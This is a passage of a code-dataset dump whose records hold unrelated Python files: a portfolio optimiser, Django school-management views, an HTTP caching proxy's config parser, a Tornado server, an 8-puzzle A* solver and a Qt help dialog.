[]\n for g in range(0, len(given_weights)):\n if given_weights[g] > 0:\n allos.append([g, given_weights[g]])\n\n num_in_port -= len(allos)\n weights = []\n l, h = [1, 2]\n for i in range(0, int(iters * .8)):\n group_1 = [random.uniform(0, 1) for x in range(0, num_in_port)]\n weights.append([group_1[x]/sum(group_1) for x in range(0, len(group_1))])\n for i in range(int(iters * 
.8), int(iters * .9)):\n group_2 = [random.uniform(l, h) for x in [1]] + [random.uniform(0, 1) for x in range(0, num_in_port - 1)]\n weights.append([group_2[x]/sum(group_2) for x in range(0, len(group_2))])\n for i in range(int(iters * .9), int(iters)):\n group_3 = [random.uniform(l, h) for x in [1, 2]] + [random.uniform(0, 1) for x in range(0, num_in_port - 2)]\n weights.append([group_3[x]/sum(group_3) for x in range(0, len(group_3))])\n\n w_allo = []\n for wts in weights:\n for al in allos:\n wts.insert(*al)\n w_sum = sum(wts)\n w_allo.append([w/w_sum for w in wts])\n\n weights = np.array([np.array(l) for l in w_allo])\n\n return [*map(weight_cov, weights)]\n\n\ndef weight_cov_mat(weight_cov, cov_mat):\n return np.matmul(weight_cov, cov_mat)\n\n\ndef get_slope(exp_ret, std, risk_free):\n return (exp_ret-risk_free)/std\n\n\ndef find_best_slope(slope_list, iterations):\n slopes = [x[3] for x in slope_list]\n high = np.unique(slopes)[int(iterations*.999)]\n max_s = [x for x in range(0, len(slopes)) if slopes[x] == high]\n return slope_list[max_s[0]]\n\n\ndef create_port_dict(tickers, best_weights):\n labels = tickers + ['exp_ret', 'std_dev']\n weights = [i for i in best_weights[0]]\n port_data = weights + best_weights[1:]\n port_dict = dict(zip(labels, port_data))\n\n return port_dict\n\n\ndef find_optimal_ports(port, combo, weight_cov, begin_stocks, iterations, risk_free):\n ##create all combinations of world of tickers\n print(combo)\n select_ticks = [i for i in combo]\n tickers = begin_stocks + select_ticks\n day_ret_mat, ann_rets = make_ret_mat(port, tickers)\n\n '''from a list of beginning stocks, \n find those stocks with the closest to zero from abs correlation values'''\n\n cov_mat = np.cov(day_ret_mat)\n data_result = []\n for wts in weight_cov:\n ##multiply weights by ret for expected return\n ##possibly assign randomly multiple times in order to maximize computing efficiency\n exp_ret = np.dot(np.array(wts[0]), ann_rets)\n\n # find port variance\n w_cov_mat = weight_cov_mat(wts[1], cov_mat)\n port_var = np.sqrt(np.sum(w_cov_mat))*np.sqrt(len(day_ret_mat))\n slope = get_slope(exp_ret, port_var, risk_free)\n data = [wts[0], exp_ret, port_var, slope]\n data_result.append(data)\n\n best_wts = find_best_slope(data_result, iterations)\n port_dict = create_port_dict(tickers, best_wts)\n\n return port_dict\n","repo_name":"jmdubish1/portfolio_tracker","sub_path":"optimal_port_decisions.py","file_name":"optimal_port_decisions.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73102532644","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.urls import reverse as r\nfrom django.contrib.auth.decorators import login_required\nfrom datetime import date\nfrom django.urls import reverse_lazy\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth import logout\nfrom django.contrib import messages\nfrom django.views.generic import CreateView\nfrom django.views.generic.list import ListView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.edit import UpdateView, DeleteView\nfrom django.contrib import messages\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.forms import PasswordChangeForm\n\nfrom django.contrib.auth import logout\nfrom .forms import 
PhotoForm, AttendanceForm, CreateUserForm, StudentForm\nfrom .models import ClassRoom, Teacher, Student, Class, BasicUser, Coordinator,Event\n\n\n@login_required\ndef create_user_type_view(request, user_type):\n template_name = 'registration/create_user.html'\n types = ('coordinator', 'teacher')\n current_user = request.user\n if user_type not in types:\n raise Http404\n if request.method == 'POST':\n form = CreateUserForm(request.POST)\n if form.is_valid():\n user = form.save()\n if user_type == 'coordinator':\n Coordinator.objects.create(user=user)\n elif user_type == 'teacher':\n Teacher.objects.create(user=user)\n return redirect(r('home_dashboard'))\n else:\n form = CreateUserForm()\n context = {'form': form,\n 'current_user': current_user}\n return render(request, template_name, context)\n\n\n@login_required\ndef create_student_view(request):\n template_name = 'registration/create_student.html'\n current_user = request.user\n if request.method == 'POST':\n userform = CreateUserForm(request.POST)\n studentform = StudentForm(request.POST)\n if userform.is_valid() and studentform.is_valid():\n user = userform.save()\n student = studentform.save(commit=False)\n student.user = user\n student.save()\n return redirect(r('home_dashboard'))\n else:\n userform = CreateUserForm()\n studentform = StudentForm()\n context = {\n 'userform': userform,\n 'studentform': studentform,\n 'current_user': current_user\n }\n return render(request, template_name, context)\n\n\n@login_required\ndef home_dashboard(request):\n current_user = request.user\n user = Coordinator.objects.filter(user__id=current_user.id)\n\n if user:\n return render(request, 'ecweb/coordinator-dashboard.html',\n {'coordinator': user.first(),\n 'current_user': current_user})\n\n user = Teacher.objects.filter(user__id=current_user.id)\n if user:\n return render(request, 'ecweb/teacher-dashboard.html',\n {'teacher': user.first(),\n 'current_user': current_user})\n\n user = Student.objects.filter(user__id=current_user.id)\n if user:\n date_start = current_user.date_joined.date()\n days_con = date.today() - date_start\n days_cont_int = int(days_con.days)\n if user[0].type_of_course == \"1-month\":\n count_day = 30 - days_cont_int\n percent = int(-100.0 * (count_day / 30))\n\n else:\n count_day = 30 * 6 - days_cont_int\n percent = int(100.0 * (count_day / (30 * 6)))\n\n return render(request, 'ecweb/student-dashboard.html',\n {'student': user.first(),\n 'current_user': current_user,\n 'days_cont_int': days_cont_int})\n\n raise Http404\n\n\n@login_required\ndef user_detail(request):\n current_user = request.user\n insta = get_object_or_404(BasicUser, pk=int(current_user.id))\n\n if request.method == 'POST':\n if \"change_password\" in request.POST:\n\n form = PasswordChangeForm(request.user, request.POST)\n if form.is_valid():\n user = form.save()\n update_session_auth_hash(request, user) # Important!\n messages.success(\n request, 'Your password was successfully updated!')\n return redirect('user_detail')\n else:\n form = PasswordChangeForm(request.user)\n return render(request, 'ecweb/student.html', {\n 'form': form\n })\n\n else:\n\n form = PhotoForm(request.POST, request.FILES, instance=insta)\n if form.is_valid():\n profil = form.save()\n profil.user = current_user\n profil.save()\n\n return redirect('user_detail')\n else:\n form = PhotoForm()\n return render(request, 'ecweb/student.html',\n {'current_user': current_user, 'form': form})\n\n\n@login_required\ndef change_password(request):\n if request.method == 'POST':\n form = 
PasswordChangeForm(request.user, request.POST)\n if form.is_valid():\n user = form.save()\n update_session_auth_hash(request, user) # Important!\n messages.success(\n request, 'Your password was successfully updated!')\n return redirect('change_password')\n else:\n messages.error(request, 'Please correct the error below.')\n else:\n form = PasswordChangeForm(request.user)\n return render(request, 'registration/change-password.html', {\n 'form': form\n })\n\n\ndef logout_view(request):\n logout(request)\n return render(request, 'registration/logout.html')\n\n\n@login_required\ndef calendar_view(request):\n events = Event.objects.all()\n return render(request, 'ecweb/calendar.html', {'events': events})\n\n\nclass ClassRoomListView(LoginRequiredMixin, ListView):\n\n model = ClassRoom\n template_name = 'ecweb/classroom/classroom.html'\n\n def get_queryset(self):\n current_user = self.request.user\n\n queryset = super(ClassRoomListView, self).get_queryset()\n\n if current_user.is_staff:\n teacher = Teacher.objects.filter(user=current_user.id)\n\n if teacher.exists():\n queryset = ClassRoom.objects.filter(\n teachers=teacher.first().id,\n is_active=True\n )\n\n else:\n queryset = ClassRoom.objects.filter(is_active=True)\n\n else:\n student = Student.objects.get(user=current_user.id)\n queryset = ClassRoom.objects.filter(\n students=student.id, is_active=True)\n\n return queryset\n\n\nclass ClassRoomDetailView(LoginRequiredMixin, DetailView):\n model = ClassRoom\n template_name = 'ecweb/classroom/detail_classroom.html'\n\n def dispatch(self, request, *args, **kwargs):\n classroom = self.get_object()\n user = request.user\n\n is_coordinator = Coordinator.objects.filter(user=user).exists()\n student_in_classroom = classroom.students.all().filter(user=user).exists()\n teacher_in_classroom = classroom.teachers.all().filter(user=user).exists()\n\n if not (student_in_classroom or teacher_in_classroom or is_coordinator):\n return redirect('classroom_view')\n\n if not classroom.is_active:\n return redirect('classroom_view')\n\n return super(ClassRoomDetailView, self).dispatch(request, *args, **kwargs)\n\n\nclass ClassRoomCreateView(LoginRequiredMixin, PermissionRequiredMixin, CreateView):\n model = ClassRoom\n template_name = 'ecweb/classroom/create_classroom.html'\n success_url = reverse_lazy('classroom_view')\n permission_required = 'ecweb.view_all_classrooms'\n fields = (\n 'number_class',\n 'level',\n 'students',\n 'teachers',\n 'turn'\n )\n\n def form_valid(self, form):\n\n self.object = form.save(commit=False)\n\n classroom_exists = ClassRoom.objects.filter(\n number_class=self.object.number_class,\n level=self.object.level,\n turn=self.object.turn\n ).exists()\n\n if classroom_exists:\n messages.error(\n self.request,\n 'This classroom already exists.'\n )\n return super(ClassRoomCreateView, self).form_invalid(form)\n\n return super(ClassRoomCreateView, self).form_valid(form)\n\n\nclass ClassRoomUpdateView(LoginRequiredMixin, PermissionRequiredMixin, UpdateView):\n model = ClassRoom\n template_name = 'ecweb/classroom/update_classroom.html'\n permission_required = 'ecweb.view_all_classrooms'\n fields = (\n 'number_class',\n 'level',\n 'students',\n 'teachers',\n 'turn'\n )\n\n def form_valid(self, form):\n\n self.object = form.save(commit=False)\n form_changed = form.has_changed()\n\n if form_changed:\n classroom_exists = ClassRoom.objects.filter(\n number_class=self.object.number_class,\n level=self.object.level,\n turn=self.object.turn\n ).exists()\n\n if classroom_exists:\n messages.error(\n 
self.request,\n 'This classroom already exists.'\n )\n return super(ClassRoomUpdateView, self).form_invalid(form)\n else:\n messages.success(\n self.request,\n 'Classroom successfully updated'\n )\n\n return super(ClassRoomUpdateView, self).form_valid(form)\n\n messages.info(\n self.request,\n 'The classroom has not changed.'\n )\n return super(ClassRoomUpdateView, self).form_valid(form)\n\n\nclass ClassRoomDeactivateView(LoginRequiredMixin, PermissionRequiredMixin, DeleteView):\n model = ClassRoom\n template_name = 'ecweb/classroom/classroom_confirm_delete.html'\n success_url = reverse_lazy('classroom_view')\n permission_required = 'ecweb.view_all_classrooms'\n\n def delete(self, request, *args, **kwargs):\n self.object = self.get_object()\n success_url = self.get_success_url()\n self.object.is_active = False\n self.object.save()\n\n return HttpResponseRedirect(success_url)\n\n\n@login_required\ndef list_classes_view(request, class_room_id):\n\n current_user = request.user\n user = Coordinator.objects.filter(user__id=current_user.id)\n if user:\n all_classes = Class.objects.filter(classroom=class_room_id)\n\n user = Teacher.objects.filter(user__id=current_user.id)\n if user:\n teacher = Teacher.objects.get(user=current_user.id)\n all_classes = Class.objects.filter(classroom__teachers=teacher.id)\n\n user = Student.objects.filter(user__id=current_user.id)\n if user:\n student = Student.objects.get(user=current_user.id)\n all_classes = Class.objects.filter(classroom__students=student.id)\n\n context = {\n 'all_classes': all_classes,\n 'current_user': current_user\n }\n return render(request, 'ecweb/classes.html', context)\n\n\n@login_required\ndef class_view(request, class_id):\n current_user = request.user\n class_obj = Class.objects.get(id=class_id)\n\n choices_student = []\n for student in class_obj.classroom.students.all():\n student_id = student.id\n student_name = '{}, {}'.format(\n student.user.last_name, student.user.first_name)\n choices_student.append((student_id, student_name))\n\n if request.method == 'POST':\n form = AttendanceForm(request.POST)\n form.fields['students'].choices = tuple(choices_student)\n\n if form.is_valid():\n students_to_update = [int(s)\n for s in form.cleaned_data['students']]\n class_obj.attendances.clear()\n class_obj.attendances.add(*students_to_update)\n\n return HttpResponseRedirect('/class')\n\n else:\n attendanced_students = [s.id for s in class_obj.attendances.all()]\n\n form = AttendanceForm(\n initial={'class_id': class_id, 'students': attendanced_students})\n form.fields['students'].choices = tuple(choices_student)\n\n context = {\n 'form': form,\n 'current_user': current_user,\n 'class_id': class_id,\n 'class_obj': class_obj\n }\n return render(request, 'ecweb/class_attendance.html', context)\n\n\n@login_required\ndef events_list_view(request):\n current_user = request.user\n events = Event.objects.all()\n\n return render(request, 'ecweb/events.html',\n {'current_user': current_user,\n 'events': events})","repo_name":"jamesperes-zz/EC","sub_path":"ecweb/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12837,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"52"}
+{"seq_id":"12188294450","text":"import configparser\nimport sys\nimport json\nimport httpantry.proxy_database as pr_db\nfrom pathlib import Path\nfrom flask import Response\n\nCONFIGURE_FILE = \"__httpantry_cache__/config\"\nTIME_DELTA = {\"days\": 86400000, \"hours\": 3600000, \"minutes\": 60000, \"seconds\": 1000, 
\"milliseconds\": 1}\n\nclass Configurations:\n def __init__(self):\n self.port_number = None\n self.response_file = None\n self.persistence = None\n self.uncached_apis = list()\n self.timeout = None\n self.store = None\n self.retrieve = None\n\ndef userConfiguration():\n \"\"\" Initializes the configuration \"\"\" \n configure_file = Path(CONFIGURE_FILE)\n if not configure_file.is_file():\n initConfigureFile()\n readConfigFile()\n\ndef readConfigFile():\n \"\"\" Reads a configuration file \"\"\"\n config = configparser.ConfigParser()\n config.read(CONFIGURE_FILE)\n\n for key in config['GENERAL']:\n evaluate_default_parameters(key, config['GENERAL'][key])\n user_params.timeout = 0\n\n for key in config['TIMEOUT']:\n if key in TIME_DELTA: \n user_params.timeout += TIME_DELTA[key] * int(config['TIMEOUT'][key])\n \n if config['CUSTOM_RESPONSES']['use_custom_responses'] == \"True\":\n evaluate_custom_responses_parameters(config['CUSTOM_RESPONSES']['file_name'])\n\ndef dynamically_config(request_json):\n \"\"\" Configures user_parameters with the specified parameter, json body, and user params \"\"\"\n for key in request_json.keys():\n if key == \"TIMEOUT\" or key == \"timeout\":\n user_params.timeout = 0\n for segment in request_json[key].keys():\n if segment in TIME_DELTA.keys():\n user_params.timeout += TIME_DELTA[segment] * int(request_json[key][segment])\n else:\n return False\n elif key == \"persistence\":\n if request_json[key] == \"True\" or request_json[key] == \"true\":\n user_params.persistence = True\n elif request_json[key] == \"False\" or request_json[key] == \"false\":\n user_params.persistence = False\n else:\n return False\n elif key == \"response_file\":\n if request_json[key] == \"False\" or request_json[key] == \"false\":\n user_params.response_file = False \n else:\n user_params.response_file = request_json[key]\n elif key == \"uncached_apis\":\n user_params.uncached_apis.append(request_json[key])\n else:\n return False\n return True\n\ndef evaluate_default_parameters(key, string):\n \"\"\" Converts from user-defined strings to parameters \"\"\"\n if key == \"port_number\":\n user_params.port_number = int(string)\n elif key == \"custom_response_file\":\n user_params.custom_response_file = string\n elif key == \"persistence\":\n if string == \"True\":\n user_params.store = pr_db.store\n user_params.retrieve = pr_db.retrieve\n else:\n user_params.store = pr_db.temp_store\n user_params.retrieve = pr_db.temp_retrieve\n elif key == \"uncached_apis\":\n user_params.uncached_apis = string.split(' ')\n\ndef evaluate_custom_responses_parameters(file_name):\n ''' stores files from custom responses file'''\n custom_responses_file = Path(file_name)\n if not custom_responses_file.is_file():\n # if file does not already exist, create it with some example data\n example_data = [{\n \"method\": \"GET\",\n \"url\": \"http://httpbin.org/get\",\n \"content\": {\n \"args\": {},\n \"headers\": {\n \"Accept\": \"*/*\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Host\": \"httpbin.org\",\n \"User-Agent\": \"python-requests/2.21.0\"\n },\n \"origin\": \"140.233.185.118, 140.233.185.118\",\n \"url\": \"https://httpbin.org/get\"\n }\n }]\n with open(file_name, 'x') as outfile:\n json.dump(example_data, outfile, indent=4)\n # read from file, format as response, store in database\n with open(file_name, 'r') as json_file:\n data = json.load(json_file)\n for custom_response in data:\n response = Response()\n response.content = json.dumps(custom_response[\"content\"])\n response.headers = 
custom_response[\"content\"][\"headers\"]\n user_params.store(custom_response[\"method\"], custom_response[\"url\"], response)\n\n\ndef initConfigureFile():\n \"\"\" Creates a configuration file with default parameters \"\"\"\n config = configparser.ConfigParser()\n config.add_section('GENERAL') \n config.set('GENERAL', 'port_number', '5000')\n config.set('GENERAL', 'persistence', 'True')\n config.set('GENERAL', 'uncached_apis', 'yourmom.com http://httpbin.org/image/jpeg')\n config.add_section('CUSTOM_RESPONSES')\n config.set('CUSTOM_RESPONSES', 'use_custom_responses', 'True')\n config.set('CUSTOM_RESPONSES', 'file_name', '__httpantry_cache__/custom_responses.json')\n config.add_section('TIMEOUT')\n config.set('TIMEOUT', 'days', '0')\n config.set('TIMEOUT', 'hours', '1')\n config.set('TIMEOUT', 'minutes', '0')\n config.set('TIMEOUT', 'seconds', '0')\n config.set('TIMEOUT', 'milliseconds', '0')\n with open(CONFIGURE_FILE, 'w') as configfile:\n config.write(configfile)\n configfile.close()\n\nuser_params = Configurations()\n","repo_name":"RowenFelt/httpantry","sub_path":"HTTPantry/parse_configuration.py","file_name":"parse_configuration.py","file_ext":"py","file_size_in_byte":5477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25512970126","text":"# -*- coding:utf-8 -*- \n\nimport tornado.options\nfrom tornado import httpserver, ioloop, web\nfrom tornado.log import app_log\nfrom tornado.options import define, options\n\nfrom conf.config import SETTINGS, LCIC_LOGGING_LEVEL, LCIC_TERMINAL_SHOW_LOGGING, LCIC_DEFAULT_PORT\nfrom router import HANDLERS\n\n# 监听的端口\ndefine(\"port\", default=LCIC_DEFAULT_PORT, help=\"default run port\", type=int)\n# 日志文件名\ndefine(\"log_file_prefix\", default=\"lcic.log\", help=\"log file prefix\")\n# 配置日志输出级别\noptions.logging = LCIC_LOGGING_LEVEL\n# 控制台是否显示日志\noptions.log_to_stderr = LCIC_TERMINAL_SHOW_LOGGING\n\n\n# APP\nclass Application(web.Application):\n def __init__(self):\n # 路由\n handlers = HANDLERS\n # 配置\n settings = SETTINGS\n super(Application, self).__init__(handlers, **settings)\n\n\n# Main入口\nif __name__ == '__main__':\n # 监听命令栏输入\n tornado.options.parse_command_line()\n app_log.error('Starting system......')\n # 启动服务器线程\n http_server = httpserver.HTTPServer(Application())\n http_server.listen(options.port)\n app_log.error('>--- Success, listen on port: {0}, logging level: {1} ---<'.format(options.port, LCIC_LOGGING_LEVEL))\n # 线程阻塞超过多长时间抛出异常,秒\n # ioloop.IOLoop.current().set_blocking_log_threshold(1)\n # 启动服务\n ioloop.IOLoop.current().start()\n","repo_name":"solidworks1210/JustDemo","sub_path":"tornado_demo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30144281258","text":"# Model: Data Structure. Controller can send messages to it, andcurrentFeatureSelectionOption model can respond to message.\n# View : User interface elements. Controller can send messages to it. View can call methods from Controller when an event happens.\n# Controller: Ties View and Model together. 
turns UI responses into changes in data.\n\nfrom controller import *\nfrom tkinter import *\n\ndef main():\n root = Tk()\n app = Controller(root)\n root.mainloop() \n \nif __name__ == '__main__':\n main() ","repo_name":"mastermueez/ML-for-Dummies","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
+{"seq_id":"23364867762","text":"import copy\nfrom os import path, stat\nfrom typing import Match\n# Jared Matson\n# #1570490\n# Asn1.py\n# ***CURRENTLY RUNS infinitely, instruction on Eclass makes it look like the program will constantly ask for states to solve***\n\n# Given 9 numbers from 0-8 (e.g 1 8 2 0 4 3 7 6 5) will return said numbers as an initial state\n#[1 8 2]\n#[ 4 3]\n#[7 6 5]\n#for the 1-8 puzzle game. The program will then use A* pathfinding to find the least amount of steps to reach\n#the goal state by sliding the blocks up/down/left/right\n#[ 1 2]\n#[3 4 5]\n#[6 7 8]\n\n#class Node\n#This class represents a possible state in the puzzle\n# value = the value of the Node e.g\n#[1 8 2]\n#[ 4 3]\n#[7 6 5]\n#gvalue = the gValue of the Node, e.g the amount of moves it took to get to that state\n#parent = the parent Node or previous state of the node\n#direction = Direction the empty spot had to move to reach Node\nclass Node:\n def __init__(self, value, gvalue, parent, direction) -> None:\n self.value = value\n self.parent = parent\n self.h = 0\n self.f = 0\n self.g = gvalue\n self.direction = direction\n\n# def InitializeBoard()\n# Takes an input from the user (e.g. 1 8 2 0 4 3 7 6 5) and will create a 2d\n# array with the values to represent the puzzle\ndef initializeBoard():\n board = []\n row = []\n goalState = [[0,1,2],[3,4,5],[6,7,8]]\n boardInput = input(\"Enter nine numbers\")\n for number in range(18): #going around spaces\n if number % 2 == 0:\n row.append(int(boardInput[number])) \n if len(row) == 3: #create new row if 3 numbers already in the current row\n board.append(row)\n row = []\n start = Node(board,0,None, \"\") #initialize root of tree\n solvePuzzle(start, goalState)\n\n# def printBoard(board)\n# Will iterate through the puzzle (2d array) and will print the \n# values to better represent what the 8 number puzzle actually looks like\n\n# Parameters:\n# board - the board being printed\n\n# Returns:\n# N/A\ndef printboard(board):\n for row in board:\n for value in row:\n if value == 0:\n print(\" \", end='')\n else:\n print(str(value) + \" \", end='')\n print(\"\")\n\n# def solvePuzzle(boardState, goalState)\n# Controls the flow of the program, will call upon multiple functions to find appropriate moves in the puzzle, as well\n# as which one is most optimal using A*\n\n# Parameters:\n# boardState - the initial state wanting to be solved\n# goalState - the goal state wanting to be reached\n\n# Returns:\n# N/A\ndef solvePuzzle(boardState, goalState):\n alreadyTraveledStates = [] #Previous states\n nextMoveList = [] #list of possible next moves in a given state\n GValue = 0\n AStarQueue = [boardState] \n goalFound = False\n while(len(AStarQueue) != 0):\n nextAction = AStarQueue.pop(0)\n alreadyTraveledStates.append(nextAction) #if value is popped out of AStarQueue, we know it is now an already travelled state\n GValue = nextAction.g + 1\n if(nextAction.value == goalState):\n printGoalPath(nextAction) #print solution path\n goalFound = True\n break\n else:\n for action in possibleActions(nextAction, alreadyTraveledStates, GValue): 
#find the possible actions in the current state, not including previously traversed states\n nextMoveList.append(action)\n AStarQueue = sortQueueUsingManhattan(AStarQueue, nextMoveList) #sort the newly found nodes into the AStarQueue \n nextMoveList.clear()#newly found nodes have been appended, now we dont need them anymore\n \n if(goalFound == False):\n print(\"No solution\")\n\n# def printGoalPath(goalNode)\n# Since the goalNode has been found, the path to get to this Node can easily be printed by printing each Nodes parent until we reach the root\n\n# Parameters:\n# goalNode - the goal Node that was found\n\n# Returns:\n# N/A\ndef printGoalPath(goalNode):\n pathList = []\n while(goalNode.parent != None): #We are at the bottom of the tree, and we want to print from the top down, not the bottom up\n pathList.insert(0,goalNode) #We can easier print the states from the root to the goal node if we just add it to a list to flip the order\n goalNode = goalNode.parent\n pathList.insert(0,goalNode) #add root node\n print(\"(Initial)\")\n for i in range(len(pathList)): #Print now in order list\n print(\"Move \"+ str(i),end=\"\")\n print(\" \",end=\"\")\n print(pathList[i].direction)\n printboard(pathList[i].value)\n print(\" \")\n print(\"============================\")\n print(\"Total number of moves: \" + str(len(pathList) - 1))\n print(\"============================\")\n \n# def sortQueueUsingMangattan(queue, movesToSortIntoQueue)\n# given the current AStarQueue and the potential states that can be taken,\n# will use A* to move the potential states into the prexisting AStarQueue\n\n# Parameters:\n# queue - the curent A* queue\n# movesToSortIntoQueue - potential states that can be taken from the current node\n\n# Returns:\n# updated A* queue \ndef sortQueueUsingManhattan(queue, movesToSortIntoQueue):\n #f(n) = g(n) + h(n)\n HValue = 0\n FValue = 0\n #list of coordinates for each number in their goal state\n oneGoal = (0,1)\n twoGoal = (0,2)\n threeGoal = (1,0)\n fourGoal = (1,1)\n fiveGoal = (1,2)\n sixGoal = (2,0)\n sevenGoal = (2,1)\n eightGoal = (2,2)\n for state in movesToSortIntoQueue:#for each move that can be taken\n value = state.value #grab the 2d array value from the Node\n HValue = 0\n FValue = 0\n #iterate through the 2d array, when you find each number, calculate manhattan distance\n for row in range(3):\n for col in range(3):\n if value[row][col] == 1:\n HValue += abs(oneGoal[0] - row)\n HValue += abs(oneGoal[1] - col)\n elif value[row][col] == 2:\n HValue += abs(twoGoal[0] - row)\n HValue += abs(twoGoal[1] - col)\n elif value[row][col] == 3:\n HValue += abs(threeGoal[0] - row)\n HValue += abs(threeGoal[1] - col)\n elif value[row][col] == 4:\n HValue += abs(fourGoal[0] - row)\n HValue += abs(fourGoal[1] - col)\n elif value[row][col] == 5:\n HValue += abs(fiveGoal[0] - row)\n HValue += abs(fiveGoal[1] - col)\n elif value[row][col] == 6:\n HValue += abs(sixGoal[0] - row)\n HValue += abs(sixGoal[1] - col)\n elif value[row][col] == 7:\n HValue += abs(sevenGoal[0] - row)\n HValue += abs(sevenGoal[1] - col)\n elif value[row][col] == 8:\n HValue += abs(eightGoal[0] - row)\n HValue += abs(eightGoal[1] - col)\n FValue = state.g + HValue\n state.f = FValue\n if(len(queue)) == 0: #if the queue is empty, just insert it into front\n queue.append(state)\n else:\n valueInserted = False\n for i in range(len(queue)): #iterate through the queue, put potential move into queue based on F value\n if(queue[i].f >= FValue): #if the current value in queue has an F value greater than the F value of the 
potential action we are looking at\n queue.insert((i), state)\n valueInserted = True \n break\n if(valueInserted == False): #if no other F value is greater than current value, put on end\n queue.append(state)\n return(queue)\n\n# def possibleActions(currentState, alreadyTraveledStates, Gvalue)\n# given the current Node and a list of already travelled states, will determine\n# other potential moves that can be made\n\n# Parameters:\n# currentState - the Node we want to branch out from\n# alreadyTraveledStates - a list of nodes already explored\n# Gvalue - G value that will be assigned to any created nodes \n\n# Returns:\n# list of new Nodes that will later be sorted by sortQueueUsingManhattan()\n\ndef possibleActions(currentState, alreadyTraveledStates, Gvalue):\n currentStateValue = currentState.value #grab the 2d array value from the node\n possibleActionsList = []\n NewZeroLocations = []\n directionTravelled = []\n ZeroRow = -1 \n ZeroCol = -1\n for row in range(3): #find where the empty tile is\n for col in range(3):\n if currentStateValue[row][col] == 0:\n ZeroRow = row\n ZeroCol = col\n\n \n moveZeroUp = [ZeroRow -1, ZeroCol] #coords of the empty stone if it moved up\n moveZeroDown = [ZeroRow + 1, ZeroCol] #coords of the empty stone if it moved down\n moveZeroRight = [ZeroRow, ZeroCol + 1] #coords of the empty stone if it moved right\n moveZeroLeft = [ZeroRow, ZeroCol - 1] #coords of the empty stone if it moved left\n\n #boundary check, if in bounds, add to a list\n if(moveZeroUp[0] > -1):\n NewZeroLocations.append(moveZeroUp)\n directionTravelled.append(\"(Move blank tile up)\")\n if(moveZeroDown[0] < 3):\n NewZeroLocations.append(moveZeroDown)\n directionTravelled.append(\"(Move blank tile down)\")\n if(moveZeroRight[1] < 3):\n NewZeroLocations.append(moveZeroRight)\n directionTravelled.append(\"(Move blank tile right)\")\n if(moveZeroLeft[1] > -1):\n NewZeroLocations.append(moveZeroLeft)\n directionTravelled.append(\"(Move blank tile left)\")\n #these are the places the empty stone can move\n #for each of these options, we will find what the new board state is\n for option in NewZeroLocations:\n possibleActionTemp = copy.deepcopy(currentStateValue) #deep copy so the original state is not modified \n temp = currentStateValue[option[0]][option[1]] #get value that is to be swapped with 0\n possibleActionTemp[option[0]][option[1]] = 0 #put zero into that spot\n possibleActionTemp[ZeroRow][ZeroCol] = temp #put the temporary value into the zero position\n duplicateFound = False\n for i in range(len(alreadyTraveledStates)): #make sure this state has not already been explored\n if(alreadyTraveledStates[i].value == possibleActionTemp):\n duplicateFound = True\n if(duplicateFound == True):\n if(len(directionTravelled) > 0):\n directionTravelled.pop(0) #we want to make sure the node we create has the right direction, if a duplicate is found, we have to pop its direction too\n continue\n else:\n possibleActionsList.append(Node(possibleActionTemp, Gvalue, currentState, directionTravelled.pop(0))) #no duplicate found, make a new Node \n \n return(possibleActionsList) #return list of Nodes with new states\n\n#program runs infinitely as of right now... 
manually terminate to stop\nwhile True:\n initializeBoard()\n","repo_name":"Matsonj30/A-PathFindingNumberPuzzle","sub_path":"asn1.py","file_name":"asn1.py","file_ext":"py","file_size_in_byte":10970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19794409418","text":"\"\"\"Module about basic help.\"\"\"\n\nfrom qtpy.QtGui import QPixmap\nfrom qtpy.QtWidgets import QDialog, QGridLayout, QLabel, QPushButton\n\n\nclass HelpDialog(QDialog):\n \"\"\"Display basic help.\"\"\"\n\n def __init__(self, icons, icon_size, short_desc, long_desc, parent=None):\n \"\"\"Initialize the HelpDialog.\"\"\"\n super().__init__(parent)\n\n assert len(icons.values()) == len(short_desc) == len(long_desc)\n\n layout = QGridLayout()\n for idx, icon in enumerate(icons.values()):\n pix = QPixmap(icon.pixmap(*icon_size))\n label = QLabel()\n label.setPixmap(pix)\n layout.addWidget(label, idx, 0)\n layout.addWidget(QLabel('' + short_desc[idx] + ''), idx, 1)\n layout.addWidget(QLabel(long_desc[idx]), idx, 2)\n\n self.ok_button = QPushButton(\"OK\")\n self.ok_button.clicked.connect(self.close)\n layout.addWidget(self.ok_button, idx + 1, 0, 1, 3)\n\n self.setWindowTitle(\"Help\")\n self.setModal(True)\n self.setLayout(layout)\n","repo_name":"GuillaumeFavelier/blockbuilder","sub_path":"blockbuilder/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"14133699674","text":"import operator, itertools as it\n\nimport numpy as np\nimport scipy, pandas\nimport matplotlib\nfrom matplotlib import pyplot, cm\nfrom matplotlib.ticker import MultipleLocator, FuncFormatter, FixedFormatter\nfrom matplotlib.colors import LinearSegmentedColormap\nfrom PIL import Image, ImageDraw, ImageEnhance\nfrom StringIO import StringIO\n\nfrom kelly_colors import kelly_colors, kelly_colors_alpha\nfrom ..aoi import get_aoi_kinds, kind_to_col, envelope, make_grid, hit_test, hit_point, scanpath_from_fixations\nfrom ..util import contrast_color, significant, make_heatmap, angle_between, steady_state\nfrom ..stats import permute_correlation_matrix\nfrom ..metrics import 